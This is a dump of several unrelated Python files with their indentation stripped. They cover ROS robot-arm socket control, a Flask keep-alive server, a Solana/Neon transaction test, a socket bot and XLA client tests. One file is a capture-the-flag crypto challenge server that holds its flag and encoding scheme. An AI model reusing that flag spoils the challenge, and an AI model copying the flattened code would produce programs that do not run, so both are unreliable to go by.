goal_msg = self.goal_from_angle(0, 0.5)
self.move_base_client.send_goal(
goal_msg, done_cb=self.done_cb, active_cb=self.active_cb, feedback_cb=self.feedback_cb)
def done_cb(self, msg, msg2):
self.can_send_goal = True
def active_cb(self):
pass
def feedback_cb(self, msg):
pass
def run(self):
# while not rospy.is_shutdown():
# self.generate_and_send_goal()
# rospy.sleep(self.goal_time_interval)
self.generate_and_send_goal()
if __name__ == "__main__":
goal_generation_node = GoalGenerationNode()
rospy.spin()
|
Hiwin_RT605_ArmCommand_Socket_20190627160421.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
speed_mode_flag = True
#Socket_command()
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
#print(2222222222)
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
#print(111111111111)
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
|
keep_alive.py
|
#code to connect uptimerobot.com to this repl to refresh it every 5 mins to keep it online
import flask
import threading
from flask import Flask
from threading import Thread
app = Flask("")
@app.route("/")
def home():
return "MagBot is online on DevServer"
def run():
app.run(host = "0.0.0.0", port = 8080)
def keep_alive():
t = Thread(target = run)
t.start()
|
test_retry_on_blocked_accounts.py
|
import os
from proxy.common_neon.constants import SYSVAR_INSTRUCTION_PUBKEY
from proxy.environment import ETH_TOKEN_MINT_ID, MINIMAL_GAS_PRICE
os.environ['SOLANA_URL'] = "http://solana:8899"
os.environ['EVM_LOADER'] = "53DfF883gyixYNXnM7s5xhdeyV8mVk9T4i2hGV9vG9io"
os.environ['ETH_TOKEN_MINT'] = "HPsV9Deocecw3GeZv1FkAPNCBRfuVyfw9MMwjwRe1xaU"
os.environ['COLLATERAL_POOL_BASE'] = "4sW3SZDJB7qXUyCYKA7pFL8eCTfm3REr8oSiKkww7MaT"
import base64
import datetime
import multiprocessing
import unittest
import rlp
from eth_tx_utils import make_instruction_data_from_tx, make_keccak_instruction_data
from eth_utils import big_endian_to_int
from ethereum.transactions import Transaction as EthTrx
from ethereum.utils import sha3
from solana.publickey import PublicKey
from solana.rpc.commitment import Confirmed
from solana.system_program import SYS_PROGRAM_ID
from solana.transaction import AccountMeta, Transaction, TransactionInstruction
from solana_utils import *
from solcx import install_solc
from spl.token.constants import TOKEN_PROGRAM_ID
from spl.token.instructions import get_associated_token_address
from web3 import Web3
from web3.auto.gethdev import w3
install_solc(version='0.7.0')
from solcx import compile_source
SEED = 'https://github.com/neonlabsorg/proxy-model.py/issues/365'
proxy_url = os.environ.get('PROXY_URL', 'http://localhost:9090/solana')
proxy = Web3(Web3.HTTPProvider(proxy_url))
eth_account = proxy.eth.account.create(SEED)
proxy.eth.default_account = eth_account.address
ACCOUNT_SEED_VERSION=b'\1'
TEST_RETRY_BLOCKED_365 = '''
// SPDX-License-Identifier: MIT
pragma solidity >=0.5.12;
contract BlockForAWhile {
uint32 counter = 0;
function add_some(uint32 some, uint32 loop, string memory _padding) public {
for(uint32 i = 0; i < loop; i++){
counter += some + i;
}
}
}
'''
def send_routine(acc_seed, contractAddress, abi, loop, return_dict, padding_string):
print("Send parallel transaction from {}".format(acc_seed))
print(datetime.datetime.now().time())
storage_contract = proxy.eth.contract(
address=contractAddress,
abi=abi
)
new_eth_account = proxy.eth.account.create(acc_seed)
right_nonce = proxy.eth.get_transaction_count(new_eth_account.address)
trx_store = storage_contract.functions.add_some(2, loop, padding_string).buildTransaction(
{
"chainId": proxy.eth.chain_id,
"gas": 987654321,
"gasPrice": 0,
"nonce": right_nonce,
}
)
trx_store_signed = proxy.eth.account.sign_transaction(trx_store, new_eth_account.key)
trx_store_hash = proxy.eth.send_raw_transaction(trx_store_signed.rawTransaction)
trx_store_receipt = proxy.eth.wait_for_transaction_receipt(trx_store_hash)
return_dict[acc_seed] = trx_store_receipt
class BlockedTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print("\ntest_retry_on_blocked_accounts.py setUpClass")
cls.token = SplToken(solana_url)
wallet = WalletAccount(wallet_path())
cls.loader = EvmLoader(wallet, EVM_LOADER)
cls.acc = wallet.get_acc()
cls.deploy_contract(cls)
print(cls.storage_contract.address)
cls.reId_eth = cls.storage_contract.address.lower()
print ('contract_eth', cls.reId_eth)
(cls.reId, cls.reId_token, cls.re_code) = cls.get_accounts(cls, cls.reId_eth)
print ('contract', cls.reId)
print ('contract_code', cls.re_code)
proxy.eth.default_account
# Create ethereum account for user account
cls.caller_ether = proxy.eth.default_account.lower()
(cls.caller, cls.caller_token, _) = cls.get_accounts(cls, cls.caller_ether)
print ('caller_ether', cls.caller_ether)
print ('caller', cls.caller)
if getBalance(cls.caller) == 0:
print("Create caller account...")
_ = cls.loader.createEtherAccount(cls.caller_ether)
print("Done\n")
# cls.token.transfer(ETH_TOKEN_MINT_ID, 2000, cls.caller_token)
collateral_pool_index = 2
cls.collateral_pool_address = create_collateral_pool_address(collateral_pool_index)
cls.collateral_pool_index_buf = collateral_pool_index.to_bytes(4, 'little')
def get_accounts(self, ether):
(sol_address, _) = self.loader.ether2program(ether)
info = client.get_account_info(sol_address, commitment=Confirmed)['result']['value']
data = base64.b64decode(info['data'][0])
acc_info = ACCOUNT_INFO_LAYOUT.parse(data)
code_address = PublicKey(acc_info.code_account)
alternate_token = get_associated_token_address(PublicKey(sol_address), ETH_TOKEN_MINT_ID)
return (sol_address, alternate_token, code_address)
def deploy_contract(self):
compiled_sol = compile_source(TEST_RETRY_BLOCKED_365)
contract_id, contract_interface = compiled_sol.popitem()
storage = proxy.eth.contract(abi=contract_interface['abi'], bytecode=contract_interface['bin'])
trx_deploy = proxy.eth.account.sign_transaction(dict(
nonce=proxy.eth.get_transaction_count(proxy.eth.default_account),
chainId=proxy.eth.chain_id,
gas=987654321,
gasPrice=0,
to='',
value=0,
data=storage.bytecode),
eth_account.key
)
trx_deploy_hash = proxy.eth.send_raw_transaction(trx_deploy.rawTransaction)
print('trx_deploy_hash:', trx_deploy_hash.hex())
trx_deploy_receipt = proxy.eth.wait_for_transaction_receipt(trx_deploy_hash)
print('trx_deploy_receipt:', trx_deploy_receipt)
self.contractAddress = trx_deploy_receipt.contractAddress
self.abi = storage.abi
self.storage_contract = proxy.eth.contract(
address=trx_deploy_receipt.contractAddress,
abi=storage.abi
)
def create_blocked_transaction(self):
print("\ncreate_blocked_transaction")
right_nonce = proxy.eth.get_transaction_count(proxy.eth.default_account)
trx_store = self.storage_contract.functions.add_some(1, 30, "").buildTransaction({'nonce': right_nonce, 'gasPrice': MINIMAL_GAS_PRICE})
trx_store_signed = proxy.eth.account.sign_transaction(trx_store, eth_account.key)
(from_addr, sign, msg) = make_instruction_data_from_tx(trx_store_signed.rawTransaction.hex())
instruction = from_addr + sign + msg
(_trx_raw, self.tx_hash, from_address) = self.get_trx_receipts(msg, sign)
print(self.tx_hash)
print(from_address)
self.storage = self.create_storage_account(sign[:8].hex())
print("storage", self.storage)
self.combined_trx = self.make_combined_transaction(self.storage, 500, msg, instruction)
return send_transaction(client, self.combined_trx, self.acc)
def finish_blocker_transaction(self):
while True:
try:
send_transaction(client, self.combined_trx, self.acc)
except:
break
def get_trx_receipts(self, unsigned_msg, signature):
trx = rlp.decode(unsigned_msg, EthTrx)
v = int(signature[64]) + 35 + 2 * trx[6]
r = big_endian_to_int(signature[0:32])
s = big_endian_to_int(signature[32:64])
trx_raw = rlp.encode(EthTrx(trx[0], trx[1], trx[2], trx[3], trx[4], trx[5], v, r, s), EthTrx)
eth_signature = '0x' + sha3(trx_raw).hex()
from_address = w3.eth.account.recover_transaction(trx_raw).lower()
return (trx_raw.hex(), eth_signature, from_address)
def sol_instr_partial_call_or_continue(self, storage_account, step_count, evm_instruction):
return TransactionInstruction(
program_id=self.loader.loader_id,
data=bytearray.fromhex("0D") + self.collateral_pool_index_buf + step_count.to_bytes(8, byteorder='little') + evm_instruction,
keys=[
AccountMeta(pubkey=storage_account, is_signer=False, is_writable=True),
# System instructions account:
AccountMeta(pubkey=PublicKey(SYSVAR_INSTRUCTION_PUBKEY), is_signer=False, is_writable=False),
# Operator address:
AccountMeta(pubkey=self.acc.public_key(), is_signer=True, is_writable=True),
# Collateral pool address:
AccountMeta(pubkey=self.collateral_pool_address, is_signer=False, is_writable=True),
# Operator's NEON token account:
AccountMeta(pubkey=get_associated_token_address(self.acc.public_key(), ETH_TOKEN_MINT_ID), is_signer=False, is_writable=True),
# User's NEON token account:
AccountMeta(pubkey=self.caller_token, is_signer=False, is_writable=True),
# System program account:
AccountMeta(pubkey=PublicKey(SYS_PROGRAM_ID), is_signer=False, is_writable=False),
AccountMeta(pubkey=self.reId, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.re_code, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.caller, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.caller_token, is_signer=False, is_writable=True),
AccountMeta(pubkey=self.loader.loader_id, is_signer=False, is_writable=False),
AccountMeta(pubkey=ETH_TOKEN_MINT_ID, is_signer=False, is_writable=False),
AccountMeta(pubkey=TOKEN_PROGRAM_ID, is_signer=False, is_writable=False),
])
def sol_instr_keccak(self, keccak_instruction):
return TransactionInstruction(program_id=keccakprog, data=keccak_instruction, keys=[
AccountMeta(pubkey=PublicKey(keccakprog), is_signer=False, is_writable=False), ])
def make_combined_transaction(self, storage, steps, msg, instruction):
print("make_combined_transaction")
trx = Transaction()
trx.add(self.sol_instr_keccak(make_keccak_instruction_data(1, len(msg), 13)))
trx.add(self.sol_instr_partial_call_or_continue(storage, steps, instruction))
print(trx.__dict__)
return trx
def create_storage_account(self, seed):
storage = PublicKey(sha256(bytes(self.acc.public_key()) + bytes(seed, 'utf8') + bytes(PublicKey(EVM_LOADER))).digest())
print("Storage", storage)
if getBalance(storage) == 0:
trx = Transaction()
trx.add(createAccountWithSeed(self.acc.public_key(), self.acc.public_key(), seed, 10**9, 128*1024, PublicKey(EVM_LOADER)))
send_transaction(client, trx, self.acc)
return storage
def test_blocked_iterative(self):
print("\ntest_blocked_iterative")
self.create_blocked_transaction()
caller_seed = "long"
manager = multiprocessing.Manager()
return_dict = manager.dict()
p2 = multiprocessing.Process(target=send_routine, args=(caller_seed, self.contractAddress, self.abi, 50, return_dict,
"""
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
"""))
p2.start()
self.finish_blocker_transaction()
p2.join()
print('return_dict:', return_dict)
self.assertEqual(return_dict[caller_seed]['status'], 1)
def test_blocked_single(self):
print("\ntest_blocked_single")
self.create_blocked_transaction()
caller_seed = "short"
manager = multiprocessing.Manager()
return_dict = manager.dict()
p2 = multiprocessing.Process(target=send_routine, args=(caller_seed, self.contractAddress, self.abi, 10, return_dict, ""))
p2.start()
self.finish_blocker_transaction()
p2.join()
print('return_dict:', return_dict)
self.assertEqual(return_dict[caller_seed]['status'], 1)
if __name__ == '__main__':
unittest.main()
|
bot.py
|
"""A simple socket interface."""
import socket
from multiprocessing import Process
from botbot.debug import debug
class Bot(object):
"""Socket bot"""
def __init__(self, host, port, debug=False):
"""Initialize the bot with host and port. Debig is an optional
flag that enables all reads and write to be displayed to the
terminal.
"""
self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._s.connect((host, port))
self.debug = debug
def close(self):
"""Close the socket"""
self._s.close()
def read(self, size=4096):
"""Read maximum size bytes from socket"""
msg = str(self._s.recv(size), 'utf-8', errors='replace')
if self.debug:
Process(target=debug, args=(msg,)).start()
return msg
def write(self, msg):
"""Write all of message to socket"""
self._s.sendall(bytes(msg, 'utf-8'))
if self.debug:
Process(target=debug, args=('>>> {}'.format(msg),)).start()
|
code70.py
|
#!/usr/bin/env python2
import socket
import threading
import time
import SocketServer
import random
HOST = "0.0.0.0"
PORT = 11071
WELCOME_MSG = "Hi, I like math and cryptography. Can you talk to me?!\n"
ERROR_MSG = "Ooops, something went wrong here. Please check your input!\n"
CORRECT_MSG = "Yay, that's right!\n"
WRONG_MSG = "Nope, that's not the right solution. Try again later!\n"
FLAG = "IW{Crypt0_c0d3}\n"
MAX_TO_SOLVE = 100
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.sendall(WELCOME_MSG)
num_solved = 0
for level in range(1,MAX_TO_SOLVE+1):
eq, res = self.rand_equation(level)
self.request.sendall("Level {}.: {}\n".format(str(level), eq))
try:
answer = self.request.recv(1024)
answer = int(self.decode(answer.strip()))
except:
self.request.sendall(ERROR_MSG)
return
if answer == res:
num_solved += 1
self.request.sendall(CORRECT_MSG)
else:
self.request.sendall(WRONG_MSG)
return
if num_solved == MAX_TO_SOLVE:
self.request.sendall(FLAG)
except:
return
def rand_equation(self, level):
num1 = num2 = 0
operators = ["*","+","-"]
num_range = [2, 20*level]
op = operators[random.randint(0, len(operators) -1)]
while (num1 in [0,1]) or (num2 in [0,1]):
num1 = random.randint(num_range[0], num_range[1])
num2 = random.randint(num_range[0], num_range[1])
res = eval(str(num1) + " " + op + " " + str(num2))
return self.encode("x " + op + " " + str(num2) + " = " + str(res)), num1
def _xor(self, a, b):
return a ^ b
def encode(self, eq):
out = []
for c in eq:
q = bin(self._xor(ord(c),(2<<4))).lstrip("0b")
q = "0" * ((2<<2)-len(q)) + q
out.append(q)
b = ''.join(out)
pr = []
for x in range(0,len(b),2):
c = chr(int(b[x:x+2],2)+51)
pr.append(c)
s = '.'.join(pr)
return s
def decode(self, answer):
try:
nums = answer.split(".")
out = []
for num in nums:
o = ord(num)-51
b = bin(o).lstrip("0b")
b = "0" * (2-len(b)) + b
out.append(b)
bs = ''.join(out)
cs = []
for c in range(0,len(bs),8):
b = bs[c:c+8]
x = chr(int(b,2) ^ (2<<4))
cs.append(x)
s = ''.join(cs)
return s
except:
return None
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
if __name__ == "__main__":
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = False
server_thread.start()
while True:
try:
time.sleep(1)
except:
break
server.shutdown()
server.server_close()
|
properties.py
|
import logging, subprocess
import threading, random
class Properties(object):
GAMMA = 0.0
CUSHION = 0
SENSITIVITY = 0.0
MAX_WINDOW_SIZE = 0
ENSEMBLE_SIZE = 0
CONFTHRESHOLD = 0.0
CONFCUTOFF = 0.0
INITIAL_DATA_SIZE = 0
MAXVAR = 0
IDENTIFIER = ''
OUTFILENAME = ''
TEMPDIR = ''
LOGFILE = ''
BASEDIR = ''
SRCAPPEND = ''
TRGAPPEND = ''
PY4JPORT = 25333
logger = None
def __init__(self, propfilename, datasetName):
dict = {}
with open(propfilename) as f:
for line in f:
(key,val) = line.split('=')
dict[key.strip()] = val.strip()
self.__class__.GAMMA = float(dict['gamma'])
self.__class__.CUSHION = int(dict['cushion'])
self.__class__.SENSITIVITY = float(dict['sensitivity'])
self.__class__.MAX_WINDOW_SIZE = int(dict['maxWindowSize'])
self.__class__.ENSEMBLE_SIZE = int(dict['ensemble_size'])
self.__class__.CONFTHRESHOLD = float(dict['confthreshold'])
self.__class__.CONFCUTOFF = float(dict['confcutoff'])
self.__class__.INITIAL_DATA_SIZE = int(dict['initialDataSize'])
self.__class__.IDENTIFIER = datasetName + '_' + str(self.__class__.MAX_WINDOW_SIZE)
self.__class__.OUTFILENAME = self.__class__.IDENTIFIER + '_' + dict['output_file_name']
self.__class__.TEMPDIR = dict['tempDir']
self.__class__.LOGFILE = self.__class__.IDENTIFIER + '_' + dict['logfile']
if self.__class__.logger: self.__class__.logger = None
self.__class__.logger = self.__setupLogger()
self.__class__.MAXVAR = 0
self.__class__.BASEDIR = dict['baseDir']
self.__class__.SRCAPPEND = dict['srcfileAppend']
self.__class__.TRGAPPEND = dict['trgfileAppend']
self.__class__.PY4JPORT = random.randint(25333, 30000)
t = threading.Thread(target=self.__startCPDJava)
t.daemon = True
t.start()
def __startCPDJava(self):
subprocess.call(['java', '-jar', 'change_point.jar', str(self.__class__.GAMMA), str(self.__class__.SENSITIVITY), str(self.__class__.MAX_WINDOW_SIZE), str(self.__class__.CUSHION), str(self.__class__.CONFCUTOFF), str(self.__class__.PY4JPORT)])
def __setupLogger(self):
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setLevel(logging.INFO)
logger.addHandler(sh)
handler = logging.FileHandler(self.__class__.LOGFILE)
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def summary(self):
line = 'Parameter values are as follows:'
line += '\nGamma = ' + str(self.GAMMA)
line += '\nSensitivity = ' + str(self.SENSITIVITY)
line += '\nEnsemble Size = ' + str(self.ENSEMBLE_SIZE)
line += '\nConfidence Threshold (NOT USED) = ' + str(self.CONFTHRESHOLD)
line += '\nConfidence Cutoff = ' + str(self.CONFCUTOFF)
line += '\nMax Window Size = ' + str(self.MAX_WINDOW_SIZE)
line += '\nInitial Training Size = ' + str(self.INITIAL_DATA_SIZE)
line += '\nMaximum Num Variables = ' + str(self.MAXVAR)
line += '\nOutput File = ' + str(self.OUTFILENAME)
return line
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
from absl.testing import absltest
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
bfloat16 = xla_client.bfloat16
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
builder.Mul(p0, p1)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
class ComputationHashTest(absltest.TestCase):
def testHash(self):
builder0 = xla_client.ComputationBuilder("computation0")
p0 = builder0.ParameterFromNumpy(np.float32(0))
p1 = builder0.ParameterFromNumpy(np.zeros((4,), np.float32))
builder0.Mul(p0, p1)
computation0 = builder0.Build()
builder1 = xla_client.ComputationBuilder("computation1")
p0 = builder1.ParameterFromNumpy(np.float32(0))
p1 = builder1.ParameterFromNumpy(np.zeros((4,), np.float32))
builder1.Mul(p0, p1)
computation1 = builder1.Build()
self.assertEqual(computation0.Hash(), computation1.Hash())
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumBF16(self):
c = self._NewComputation()
c.Add(c.Constant(bfloat16(1.11)), c.Constant(bfloat16(3.14)))
self._ExecuteAndCompareClose(c, expected=bfloat16(4.25))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
